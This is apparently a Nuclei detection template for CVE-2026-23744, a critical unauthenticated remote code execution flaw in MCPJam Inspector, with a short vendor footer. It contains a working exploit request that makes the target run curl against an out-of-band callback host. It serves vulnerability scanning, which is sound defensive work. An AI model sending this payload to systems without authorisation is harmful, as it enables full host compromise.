id: CVE-2026-23744
info:
name: MCPJam Inspector - Remote Code Execution
author: Louay-075
severity: critical
description: |
MCPJam inspector is the local-first development platform for MCP servers. The Latest version 1.4.2 and earlier are vulnerable to a remote code execution (RCE) vulnerability, which allows an attacker to send a crafted HTTP request that triggers the installation of an MCP server, leading to RCE.
impact: |
An unauthenticated attacker can remotely execute arbitrary system commands via the exposed /api/mcp/connect endpoint. Successful exploitation leads to full compromise of the affected host.
remediation: |
Upgrade MCPJam Inspector to version 1.4.3 or later. Restrict the service to listen on 127.0.0.1.
reference:
- https://github.com/MCPJam/inspector/security/advisories/GHSA-232v-j27c-5pp6
- https://github.com/advisories/GHSA-232v-j27c-5pp6
- https://nvd.nist.gov/vuln/detail/CVE-2026-23744
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2026-23744
epss-score: 0.38374
epss-percentile: 0.98384
cwe-id: CWE-306
metadata:
verified: true
max-request: 1
vendor: mcpjam
product: mcpjam
tags: cve,cve2026,rce,mcpjam,oast,ai,vkev
http:
- raw:
- |
POST /api/mcp/connect HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"serverConfig":{"timeout":10000,"command":"curl","args":["{{interactsh-url}}"],"env":{}},"serverId":"mymcp"}
matchers:
- type: dsl
dsl:
- 'contains_all(body, "Connection failed for server", "MCP error")'
- 'contains(content_type, "application/json")'
- 'contains(interactsh_protocol, "dns")'
- 'status_code == 500'
condition: and
# digest: 4a0a00473045022007d1dd6a40b7b1c810dc7e28bcd373242148f4bc62fcd28dfea9fc96362e381d0221008118e60646ac0428fd554b094d28aa403c2d37290fde9657b94fb4fbcc552f67:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation